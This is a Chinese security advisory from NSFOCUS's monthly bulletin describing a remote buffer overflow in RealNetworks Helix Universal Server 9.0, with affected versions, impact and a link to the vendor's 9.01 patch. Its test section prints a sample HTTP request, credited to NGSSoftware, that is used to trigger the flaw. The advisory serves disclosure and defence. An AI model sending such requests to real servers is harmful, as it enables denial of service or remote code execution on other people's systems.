首页 -> 安全研究

安全研究

绿盟月刊
绿盟安全月刊->第38期->最新漏洞
期刊号: 类型: 关键词:
RealNetworks Helix Universal Server超长URI双HTTP请求远程缓冲区溢出漏洞

日期:2003-01-03

发布日期:2002-12-20
更新日期:2002-12-27

受影响系统:
Real Networks Helix Universal Server 9.0
不受影响系统:
Real Networks Helix Universal Server 9.01
描述:
--------------------------------------------------------------------------------
BUGTRAQ  ID: 6458

Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。

Helix Universal Server由于对HTTP请求缺少正确边界缓冲区检查,远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击,可能以服务器进程权限在系统上执行任意指令。

攻击者通过发送两个包含超长URI的HTTP请求给Helix服务器(默认WEB监听端口为TCP 80),就会触发缓冲区溢出,在Windows系统下,Helix服务器以系统服务安装,因此精心提供Transport字段数据可能以SYSTEM权限在系统上执行任意指令。而在Unix下以Helix服务器进程权限执行任意指令。

<*来源:NGSSoftware Insight Security Research (nisr@nextgenss.com)
  
  链接:http://marc.theaimsgroup.com/?l=bugtraq&m=104042000108006&w=2
*>

测试方法:
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

NGSSoftware Insight Security Research (nisr@nextgenss.com)提供了如下测试方法:

GET /SmpDsBhgRl3a685b91-442d-4a15-b4b7-566353f4178fAAAAAA--> HTTP/1.0
User-Agent: RealPlayer G2
Expires: Mon, 18 May 1974 00:00:00 GMT
Pragma: no-cache
Accept: application/x-rtsp-tunnelled, */*
ClientID: WinNT_5.2_6.0.11.818_RealPlayer_R1P04D_en-us_UNK
Cookie:
cbid=dfjgimiidjcfllgheokrqprqqojrptnpikcjkioigjdkfiplqniomprtkronoqmuekigihd
i
X-Actual-URL: rtsp://www.ngssoftware.com/nosuchfile.rt

建议:
--------------------------------------------------------------------------------
厂商补丁:

Real Networks
-------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载升级到最新程序:

Real Networks Helix Universal Server 9.0:

Real Networks Upgrade Helix Universal Server 9.01
http://www.service.real.com/downloads.html
版权所有,未经许可,不得转载